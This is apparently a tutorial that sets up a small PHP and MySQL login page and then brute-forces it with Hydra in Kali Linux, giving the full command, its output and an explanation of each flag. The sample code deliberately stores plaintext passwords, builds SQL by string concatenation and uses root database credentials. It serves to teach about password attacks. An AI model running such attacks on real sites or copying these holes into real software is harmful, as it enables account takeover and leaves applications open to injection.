Hacking Web Login using Hydra in Kali Linux

In this tutorial, we will develop a sample web application and launch an online password attack against it. We will use 'hydra' in Kali LInux for the attack.

Given below is the PHP application and MySQL database table.
The application consists of 2 pages.
1) user_login.html
2) user_verify.php

1) The login page 'user_login.html'

user_login.html
<html>
<body>
 <form method="post" action="user_verify.php">
   <label for="name">User Name:</label>
   <input type="text" id="name" name="name" /><br />

   <label for="passwd">Password:</label>
   <input type="text" id="passwd" name="passwd" /><br />

   <input type="submit" value="login" name="submit" />
 </form>
</body>
</html>


2) The page 'user_verify.php' displays the below message on successful login.

user_verify.php
<html>
<body>
<?php
$name = $_POST['name'];
$passwd = $_POST['passwd'];

$conn = new mysqli("localhost","root","root","hacking");
if ($conn->connect_error){
    die("Connection failed:  " . $conn->connect_error);
}

$sql = "select * from customer where name = '" . $name . "'";
$result = $conn->query($sql);

$row= $result->fetch_assoc();

$pvalue = $row["passwd"];

if(strcmp($passwd,$pvalue) == 0){
        echo "login successful";
}else{
        echo "login error";
}
$conn->close();
?>
</body>
</html>

3) The MySQL database table Customer

 MariaDB [hacking]> desc customer;
+-----------+--------------+------+-----+---------+-------+
| Field     | Type         | Null | Key | Default | Extra |
+-----------+--------------+------+-----+---------+-------+
| name      | varchar(50)  | NO   | PRI | NULL    |       |
| passwd    | varchar(50)  | YES  |     | NULL    |       |
| firstname | varchar(50)  | YES  |     | NULL    |       |
| surname   | varchar(50)  | YES  |     | NULL    |       |
| address   | varchar(200) | YES  |     | NULL    |       |
+-----------+--------------+------+-----+---------+-------+


4) Using hydra to attack the above application. We provide a wordlist of passwords to hydra. If the password matches one of the words in our wordlist, we will successfully login to the application.

root@kali:~# hydra www.mycompany.com http-form-post "/user_verify.php:name=^USER^&passwd=^PASS^:login error"  -l priya -P /usr/share/wordlists/fasttrack.txt -t 10 -w 30 -o hydra_attack.txt

Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-04-16 23:17:22
[DATA] 10 tasks, 1 server, 133 login tries (l:1/p:133), ~13 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 192.168.122.1   login: priya   password: blue
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-16 23:17:23
root@kali:~#


where
       www.mycompany.com :- the website being attacked
       http-form-post             :- POST method is used to submit the form
       user_verify.php           :- password verifying script
       name=^USER^&passwd=^PASS^ :- form parameters
       login error                   :- the message displayed by the script on incorrect login
       -l priya                          :- the login name used to attack the website

       -P /usr/share/wordlists/fasttrack.txt :- the wordlist used for the attack
       -t 10                              :- run 10 tasks in parallel

       -w 30                             :- max amount of time to wait for response (in sec)
       -o hydra_attack.txt      :- output file